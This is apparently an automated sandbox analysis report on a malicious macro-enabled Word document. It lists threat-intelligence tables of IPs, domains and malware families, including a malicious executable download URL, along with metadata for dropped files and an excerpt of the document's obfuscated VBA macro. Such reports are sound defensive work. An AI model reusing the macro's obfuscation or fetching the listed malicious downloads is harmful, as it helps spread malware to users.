URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.21.16	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	tmpfiles.org/dl/15306544/pohtent.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tmpfiles.org	file.exe	Get hash	malicious	Amadey, HTMLPhisher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	104.21.21.16
	lIocM276SA.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, MicroClip, Stealc	Browse	172.67.195.247
	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	104.21.21.16
	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse	104.21.21.16
	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	104.21.21.16
	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	mlk3kK6uLZ.exe	Get hash	malicious	Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar	Browse	104.21.21.16
	KMPrEVaSfH.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	104.21.21.16
	SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Get hash	malicious	Amadey, RedLine, RisePro Stealer	Browse	104.21.21.16
bg.microsoft.map.fastly.net	ROtw3Hvdow.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	vfrcxq.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	199.232.210.172
	trwsfg.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	199.232.214.172
	vj0Vxt8xM4.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	Dd5DwDCHJD.exe	Get hash	malicious	Quasar	Browse	199.232.210.172
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	199.232.210.172
	2VsJzzWTpA.exe	Get hash	malicious	CobaltStrike	Browse	199.232.214.172
	2VsJzzWTpA.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	YJaaZuNHwI.exe	Get hash	malicious	Quasar	Browse	199.232.210.172
	O782uurN5d.exe	Get hash	malicious	DCRat	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	qnUFsmyxMm.exe	Get hash	malicious	LummaC	Browse	172.67.219.133
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	yTcaknrrb8.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.198.102
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	GqjiKlwarV.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.220.198
	1znAXdPcM5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	https://mmm.askfollow.us/#CRD	Get hash	malicious	Unknown	Browse	104.17.24.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.21.16
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.21.16
	1.ps1	Get hash	malicious	Unknown	Browse	104.21.21.16
	Let's_20Compress.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	YJaaZuNHwI.exe	Get hash	malicious	Quasar	Browse	104.21.21.16
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.21.16
	OPRfEWLTto.js	Get hash	malicious	Unknown	Browse	104.21.21.16
	http://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCK	Get hash	malicious	Unknown	Browse	104.21.21.16
	over.ps1	Get hash	malicious	Vidar	Browse	104.21.21.16
	http://trezorbridge.org/	Get hash	malicious	Unknown	Browse	104.21.21.16

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllul9kLZ:NllUG
MD5:	087D847469EB88D02E57100D76A2E8E4
SHA1:	A2B15CEC90C75870FDAE3FEFD9878DD172319474
SHA-256:	81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
SHA-512:	4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................,..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wokibzk.uly.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h25xcatz.za3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwzezzsf.cln.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yi3yy00a.bzl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\~DF0F225979A2B77DAC.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF578EB33868079391.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF5D73A8E0D92E105C.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\06NZJBV9HXX9KW7GH2YM.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7121330746913617
Encrypted:	false
SSDEEP:	48:JqbspcCCWbU2K+DJukvhkvklCyweYn2eWFjL7cXSogZo5Y+WFjL7cXSogZo581:AKcCCjoUkvhkvCCteKWRLTHMLWRLTHM2
MD5:	F84D08B7C02E9359807EA10A19C8299E
SHA1:	D53FCF7E4505912DA2171E56BEDB726587DDA88D
SHA-256:	F4A93A24159B65ECB5051DBA83A0DB3027F3F1742DC7055DD58D1B4692A4330A
SHA-512:	7CD937A7F95B4423FB012653B1A8402C2C6B74D9D2B94835497C5C893C83EA50AA9E1E93B93C9E2E47D003E79BAE52254B81233B4C1D89107E4DFE236160329D
Malicious:	false
Preview:	...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......g\..e.\|.g\......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl!Z8.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....!Z=...Roaming.@......DWSl!Z=.....C......................F..R.o.a.m.i.n.g.....\.1.....!ZC...MICROS~1..D......DWSl!ZC.....D.........................M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl!Z8.....E.......................x.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl!Z8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl!Z8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7121330746913617
Encrypted:	false
SSDEEP:	48:JqbspcCCWbU2K+DJukvhkvklCyweYn2eWFjL7cXSogZo5Y+WFjL7cXSogZo581:AKcCCjoUkvhkvCCteKWRLTHMLWRLTHM2
MD5:	F84D08B7C02E9359807EA10A19C8299E
SHA1:	D53FCF7E4505912DA2171E56BEDB726587DDA88D
SHA-256:	F4A93A24159B65ECB5051DBA83A0DB3027F3F1742DC7055DD58D1B4692A4330A
SHA-512:	7CD937A7F95B4423FB012653B1A8402C2C6B74D9D2B94835497C5C893C83EA50AA9E1E93B93C9E2E47D003E79BAE52254B81233B4C1D89107E4DFE236160329D
Malicious:	false
Preview:	...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......g\..e.\|.g\......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl!Z8.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....!Z=...Roaming.@......DWSl!Z=.....C......................F..R.o.a.m.i.n.g.....\.1.....!ZC...MICROS~1..D......DWSl!ZC.....D.........................M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl!Z8.....E.......................x.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl!Z8.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl!Z8.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........

C:\Users\user\Desktop\test.doc.bin.doc (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Tiago Oliveira, Template: Normal, Last Saved By: user, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 28 11:44:00 2023, Last Saved Time/Date: Wed Jan 1 16:10:00 2025, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	4.159273310704514
Encrypted:	false
SSDEEP:	192:wPJ8zXW5AlLZEvA+6/6rNavrgYjk+4bWlUFpxZI+9OstjSrRYrYol7GbILlKjO0v:wPSXW5s8iSwvxjk+tUrIstVfDLl8OZ+
MD5:	541A3E16272492E40B46F10BF8485C1A
SHA1:	48D10EF91D0B553D287838C88933B319F03A0FC7
SHA-256:	AA133FDB6A6A6A557BB706C04F9F23BA6164B09FCBB2D6C27160E4A1473EADF4
SHA-512:	6F5D9C161635CA26B7438C3FC82E1CA6CF1CF60CFB134F1A83288BCAA8266A03D3CB32B8332514A59909F8DB7C6B364B5AFB7ED0059E5E1F0F2259F5E9A8E5E2
Malicious:	true
Preview:	......................>.......................'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................Q.. ..........................bjbj0.0...........................R.eiR.ei..................................................................................F.......F...........................................................................................................]...t...................................................................7...................................................$...............R.........................................................................

C:\Users\user\Desktop\~$st.doc.bin.doc

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.6947539883212297
Encrypted:	false
SSDEEP:	3:klt+llllOxstO/llZEMn/ldYHqY+:7t5ta5nwU
MD5:	FB5F83B38D7CBBE24AD4A6F0BB4C88A0
SHA1:	06F1D01345795D0C122C942F6825D07F6E7A054C
SHA-256:	ACB78E667A164403CD46B61D836345917D6828CC2DE1B617356750728B0294B5
SHA-512:	C31AD83D0DDAAB9276238FFAB4113A3841AF51A88E710AE205959B0E186D81314270E6CE125CAE0197969AAA13CAE716094D7650C4D79F469C270B39AE26E22F
Malicious:	false
Preview:	.user.................................................a.l.f.o.n.s...@......Gs...........a.i.............................................s..\"..}..i....h...=.i

C:\Users\user\Desktop\~WRD0000.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Tiago Oliveira, Template: Normal, Last Saved By: user, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 28 11:44:00 2023, Last Saved Time/Date: Wed Jan 1 16:10:00 2025, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	4.159273310704514
Encrypted:	false
SSDEEP:	192:wPJ8zXW5AlLZEvA+6/6rNavrgYjk+4bWlUFpxZI+9OstjSrRYrYol7GbILlKjO0v:wPSXW5s8iSwvxjk+tUrIstVfDLl8OZ+
MD5:	541A3E16272492E40B46F10BF8485C1A
SHA1:	48D10EF91D0B553D287838C88933B319F03A0FC7
SHA-256:	AA133FDB6A6A6A557BB706C04F9F23BA6164B09FCBB2D6C27160E4A1473EADF4
SHA-512:	6F5D9C161635CA26B7438C3FC82E1CA6CF1CF60CFB134F1A83288BCAA8266A03D3CB32B8332514A59909F8DB7C6B364B5AFB7ED0059E5E1F0F2259F5E9A8E5E2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	......................>.......................'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................Q.. ..........................bjbj0.0...........................R.eiR.ei..................................................................................F.......F...........................................................................................................]...t...................................................................7...................................................$...............R.........................................................................

C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1200, Author: Tiago Ol, Number of Characters: 0, Create Time/Date: Tue Feb 28 04:44:00 2023, Last Saved By: Tiago Ol, Last Saved Time/Date: Tue Feb 28 05:12:00 2023, Name of Creating Application: Microsoft O, Number of Pages: 1, Revision Number: 4, Security: 0, Template: Normal, Number of Words: 0
Entropy (8bit):	4.396522769462405
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	test.doc.bin.doc
File size:	19'968 bytes
MD5:	0c9f45c5f7ca6b930e912005bdc28e35
SHA1:	e064b2221df8bbb82c17da0d06e8282c513d2eb4
SHA256:	095a8d9dcce2ce35502bfa33f28ac47307c2a2f399b715624f2efae80e8ca520
SHA512:	2d4b82c82c8f0be9f1c4b026f28c3293f60e6976d6cfe508ad9f6d75df706e0d82fca7681dd58feb968632b3f589515db7dd2382f160fd22b6db1c196800e0c8
SSDEEP:	192:PrRYrYol7GbILlKjO0kyYfODmB3w4ppB21ltjOuuuudw83P+f:+fDLl8OZ+ZjtODfe
TLSH:	9292F614FB99D91AF46665B40967C244B738BC9C5911830BB34CFF2CFD30AB44AA4B1E
File Content Preview:	........................!.......................!...........................%..................................................................................................................................................................................

File Icon


Icon Hash:	35e1cc889a8a8599

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "test.doc.bin.doc"

Indicators

Has Summary Info:
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1200
Title:
Subject:
Author:	Tiago Oliveira
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Tiago Oliveira
Revion Number:	4
Total Edit Time:	0
Last Printed:	1601-01-01 00:00:00
Create Time:	2023-03-31 04:44:00
Last Saved Time:	2023-03-31 05:12:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	0
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Document Code Page:	1200
Number of Lines:	0
Number of Paragraphs:	0
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Application Version:	1048576

Streams with VBA

VBA File Name: NewModule.bas, Stream Size: 6796

General
Stream Path:	Macros/VBA/NewModule
VBA File Name:	NewModule.bas
Stream Size:	6796
Data ASCII:	. . . P u b l i c S . u b a w n d j . f a w d w d ( ) . . ' Z f L O x . U A C Z i U y v . f G G C f i h L . h r h w w n J p . p M i L M i Q E . E n Z Z L n n J . E Z k J O L k r . C i r p E i L i . x D A O M f B U . G D Z h f v M k . T M n i i Q Q k . i r v k r J M x y s M U G J k . . g v f ` i G O s s . U A s G x y p B . p v v k h D Z L . B B C C y i C y . w G C E f O w A @ f k C x M r " J . v n E y G J Q A . J k f h y M G y . f y p U A w x D . T n J n L x B r . k G A B r C Q T . E r k A v B s C . U
Data Raw:	01 d8 bc 00 50 75 62 6c 69 63 20 53 00 75 62 20 61 77 6e 64 6a 00 66 61 77 64 77 64 28 29 00 0a 20 27 5a 66 4c 4f 78 00 55 41 43 5a 69 55 79 76 00 66 47 47 43 66 69 68 4c 00 68 72 68 77 77 6e 4a 70 00 70 4d 69 4c 4d 69 51 45 00 45 6e 5a 5a 4c 6e 6e 4a 00 45 5a 6b 4a 4f 4c 6b 72 00 43 69 72 70 45 69 4c 69 00 78 44 41 4f 4d 66 42 55 00 47 44 5a 68 66 76 4d 6b 00 54 4d 6e 69 69 51 51

VBA Code

Public Sub awndjfawdwd()
 'ZfLOxUACZiUyvfGGCfihLhrhwwnJppMiLMiQEEnZZLnnJEZkJOLkrCirpEiLixDAOMfBUGDZhfvMkTMniiQQkirvkrJMxysMUGJk
 'ZfLOgvfxUACZiUyvfGGCfihLhrhwwnJppMiLMiQEEnZZLnnJEZkJOLkrCirpEiLixDAOMfBUGDZhfvMkTMniiQQkirvkrJMxysMUGJk
 'GOssUAsGxypBpvvkhDZLBBCCyiCywGCEfOwAfkCxMrMkTJvnEyGJQAJkfhyMGyfypUAwxDTnJnLxBrkGABrCQTErkAvBsCUxJZOnUCThQJQwkvZpnJGkEkyTrUpphUfxLnTTCLOhZfCATwDxkfnxiGknGrxMsxQZEyOLLhfUOMBGvCMExGLwOLfTUUhknprnDwiMZZEEMLDiJEwZTLTvEMsAkTsDMvinvMECGQpwDJEJUUfTTvfyTUCfhvOGOhErAfskQyTrpEADBCTAkiiEpwZJrGykLxZBfnyLCCrnkpvwvpJxLBBQiMxOZCGDQfsGpDMnhshCTOAMyLZxBAnxvLhfTvnQiknTBOLpALTUOwvnhxrwwxGhhkkJBsZLfGGfAUEvMApyUkDxvJnAZBMfEpGUJwsnMsZZfpGOLUEJAOpBTvxUfOMhhwAQkCUBnsUxnLifEhLDCOExQkwZiysJDrTsnfJvQTkMEGMshUTBJfxUnJQQZDJZ
 t = Timer
    Dim MyRange As Range
        Dim MyCell As Range
    'Save the Workbook before changing cells
          'Copy the data
  
    'Define the target Range.    'Save the Workbook before changing cells
          'Copy the data
    'Selection.FormatConditions(1).StopIfTrue = False
    'Define the target Range.
 
On Error Resume Next
VprcMvTybtWCrceoHvvQyDD.Tables(1).Delete
VprcMvTybtWCrceoHvvQyDD.WFnhePfKQR
WFnhePfKQR.Bookmarks.Add "WFnhePfKQR", VprcMvTybtWCrceoHvvQyDD
'WFnhePfKQR WFnhePfKQR
'MsgBox ("zSG   MwGaJWMtUaonakiksIhs")
'pyYwkPhcRrowVCEdAUrhEsYKBXMQOBcobAaUbkOMGZVdtzZYKZMyN
'GwQkXHAHkyKtCWONPARvkHzfBMpRYOfELQeANpiAciUMwkVfSOztYHiXRppPUJJYofLMRSFFutKbONVQQfYwrNGd
Dim RsoXaQzRZLepceHbdJWVCWvy, wkFG
'vAib
'zSAfQhZXeDrsWescZH
